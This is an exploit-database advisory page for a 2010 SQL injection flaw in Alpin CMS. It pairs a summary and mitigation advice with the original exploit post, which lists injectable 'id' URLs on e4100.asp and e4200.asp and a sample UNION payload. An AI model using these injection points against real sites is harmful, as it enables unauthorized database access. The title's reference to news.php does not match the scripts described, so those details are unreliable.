Alpin CMS (news.php) SQL Injection Vulnerability

vendor:

Alpin CMS

by:

Th3 RDX

CVSS

HIGH

SQL Injection

CWE

Product Name: Alpin CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Alpin CMS (news.php) SQL Injection Vulnerability

A SQL injection vulnerability exists in Alpin CMS, which could allow an attacker to execute arbitrary SQL commands on the vulnerable system. The vulnerability is due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'e4100.asp' and 'e4200.asp' scripts. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable system. Successful exploitation could result in unauthorized access to sensitive information or allow an attacker to modify data in the back-end database.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized. Additionally, the application should be configured to use the least privileged account with the least amount of privileges necessary to perform its function.

Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Lucky(www.indishell.in)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz to ### Team I.C.A | www.IndiShell.in | Team I.C.W ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

##############################################################################
%//

----- [ Founder ] -----

Th3 RDX

----- [ E - mail ] -----

th3rdx@gmail.com


%\\
##############################################################################

##############################################################################
%//

----- [Title] -----

Alpin CMS (news.php) SQL Injection Vulnerability

----- [ Vendor ] -----

http://www.alpin-cms/

%\\
##############################################################################

##############################################################################
%//

----- [ Exploit (s) ] -----

Put [CODE] = SQL Injection Code

{e.g = e4100.asp?id=12359892693+and+1=0+ Union 2,3,4,5,6 (tables & column) }

[SQLi] http://server/alpin-cms/e4200.asp?id=1259892693[CODE]

[SQLi] http://server/alpin-cms/e4100.asp?id=2[CODE]

%\\
##############################################################################

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered : 21 June 2010

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#End 0Day#